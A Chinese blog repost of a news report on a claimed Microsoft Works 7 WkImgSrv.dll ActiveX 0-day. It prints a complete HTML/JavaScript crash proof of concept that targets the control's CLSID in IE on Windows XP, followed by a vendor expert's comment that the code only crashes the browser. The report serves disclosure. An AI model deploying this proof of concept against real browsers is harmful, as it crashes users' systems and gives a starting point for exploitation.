I'n Blog 之萬象真藏

中國IT實驗室4月21日報導：近日收到網友發來的郵件，反映了一個Windows 0Day漏洞。並在其博客中給出了相關代碼。

[0day]Microsoft Works 7 WkImgSrv.dll crash POC，dll版本7.03.0616.0，IE7+Windows XP SP2 測試通過。

[html]
[head]
[title]Microsoft Works 7 WkImgSrv.dll crash POC[/title]
[script language="JavaScript"]
 function payload() {
 var num = -1;
 obj.WksPictureInterface = num;
 }
 [/script]
[/head]
[body onload="JavaScript: return payload();"]
[object classid="clsid:00E1DB59-6EFD-4CE7-8C0A-2DA3BCAAD9C6" id="obj"]
[/object]
[/body]
[/html]

與金山專家李鐵軍聯繫，得到了珠海研發中心的回覆，如下：

近幾天網絡上流傳著一個傳說為IE 0DAY的POC代碼，在Windows XP系統環境下通殺了IE6和IE7，其它系統並未經過測試。其實這個漏洞並不是存在於IE，而是Microsoft Works的組件被挖掘出漏洞，部分的Windows XP預裝了Microsoft Works，所以就出現了過全補丁系統的漏洞（如華碩易PC 就預裝了Microsoft Works）。這段攻擊代碼會讓瀏覽器崩潰，目前尚不能因此傳播惡意軟件。